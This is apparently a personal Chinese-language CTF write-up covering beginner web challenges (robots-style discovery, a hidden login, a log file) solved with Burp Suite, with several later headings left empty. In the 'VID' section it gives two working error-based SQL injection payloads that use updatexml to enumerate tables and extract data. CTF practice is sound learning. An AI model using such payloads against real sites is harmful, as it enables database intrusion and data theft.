记ctf实战

最近本姑娘着迷ctf类竞赛，有志同道合的小伙伴可以留言一起来做点趣味题目呢

此网站第一道题目如下

一、robot

1，先进网站，发现了一张萌萌哒的图片，相信许多人和本姑娘一样，第一反应是load图片查看代码里面有没有猫腻，然而其实什么也木有呢。本姑娘就第一时间抓了包，用的burp你懂的。

2,本姑娘在burp里面稍微找了一下，因是第一道题，着实没有什么难处，在spider发现了如下东西，就是本题解题思路啦

3，直接输入找的线索，得到小旗旗

二、ipspoofing

1，打开页面，发现是个页面，本姑娘按照一般思路看了下源代码没发现可疑之处，于是抓包。

2，抓包后右键到spider想找找页面信息，不了突然跳出了如图所示的东西，甚为惊喜，上面给了登录网址，密码用户名，本姑娘快速访问链接

3，后来再浏览文件时发现页面最下方有链接提示，直接可进入登录页面

4，激动人心的最后一步，本姑娘输入了spider里面的用户名和密码登录不成功，立刻看源码，如图看到登录的username和password

三、seelog

1，第三个题目有点意思，本姑娘回头想想答案全在题目里面

首先看着页面see blog 看到这里本姑娘一直在头脑风暴，势必记住看blog ，打开网址。

2，网页是非请勿入，本姑娘，依然先看源代码，再抓包都没有什么重大发现

3，纠结了半天，发现猫腻都在blog 里面，本姑娘在网页后面加了一个blog 出现了如图所示的东西

4，打开第一个文件，查看blog 在这里科普两个小常识，

（1）一些常见的状态码为：

• 200 – 服务器成功返回网页
• 404 – 请求的网页不存在
• 503 – 服务器超时

（2）Ctrl+F快捷键查看

终于找到了图示的链接

5，输入提示的链接成功拿到小旗旗

四、phpinfo

五、VID

number=0&username=%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#&password=123&submit=Submit+Query  //爆表

number=0&username=%00' and updatexml(1,concat(1,substr((select * from flag),1,15)),1)#&password=123&submit=Submit+Query   //爆flag

六、GetFlag

七、天下武功唯快不破

八、pyscript

九、fuzzing

十、blog